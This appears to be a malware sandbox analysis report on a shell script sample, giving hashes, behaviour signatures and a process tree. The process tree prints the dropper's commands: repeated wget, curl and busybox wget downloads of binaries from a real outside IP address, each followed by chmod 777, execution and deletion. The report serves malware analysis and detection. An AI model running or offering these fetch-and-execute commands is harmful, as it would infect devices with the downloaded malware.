Analysis
-
max time kernel
16s -
max time network
18s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-11-2024 03:33
Static task
static1
Behavioral task
behavioral1
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
-
Size
10KB
-
MD5
01b56d1b9cc005de6042881dafcef1bf
-
SHA1
37f98670c045d4e2627287b76bed156bae8d9a10
-
SHA256
4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8
-
SHA512
617294ee58e825e6af28f02ab893ca33b04be9f8b1154d6f335a5b8085e2706046661ab704c92730764d6e1b132af69593e9d054e4fe2a31c9aa326ab52f6ac2
-
SSDEEP
192:qfHqRU7VKbQJxAcqZdGhBu4pHZdGhBNTfHqTY9JxAcp:pS7VKblKLs9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 675 chmod 702 chmod 780 chmod 831 chmod 757 chmod 795 chmod 825 chmod 813 chmod 819 chmod 682 chmod 722 chmod 747 chmod 801 chmod 807 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 677 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR 683 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX 703 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 725 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO 748 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx 759 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm 782 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd 796 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf 802 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR 808 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK 814 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk 820 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm 826 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt 832 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt -
Checks CPU configuration 1 TTPs 14 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8 curl File opened for modification /tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK curl File opened for modification /tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk curl File opened for modification /tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm curl File opened for modification /tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR curl File opened for modification /tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6 curl File opened for modification /tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx curl File opened for modification /tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf curl File opened for modification /tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt curl File opened for modification /tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX curl File opened for modification /tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO curl File opened for modification /tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm curl File opened for modification /tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd curl File opened for modification /tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR curl
Processes
-
/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:648
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:672
-
-
/bin/chmodchmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- File and Directory Permissions Modification
PID:675
-
-
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Executes dropped EXE
PID:677
-
-
/bin/rmrm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:678
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:679
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:681
-
-
/bin/chmodchmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Executes dropped EXE
PID:683
-
-
/bin/rmrm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:684
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:697
-
-
/bin/chmodchmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Executes dropped EXE
PID:703
-
-
/bin/rmrm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:704
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:706
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:718
-
-
/bin/chmodchmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:726
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:745
-
-
/bin/chmodchmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:752
-
-
/bin/chmodchmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:776
-
-
/bin/chmodchmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:783
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:784
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:794
-
-
/bin/chmodchmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:800
-
-
/bin/chmodchmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:806
-
-
/bin/chmodchmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:812
-
-
/bin/chmodchmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:818
-
-
/bin/chmodchmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:824
-
-
/bin/chmodchmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:830
-
-
/bin/chmodchmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf2⤵PID:834
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97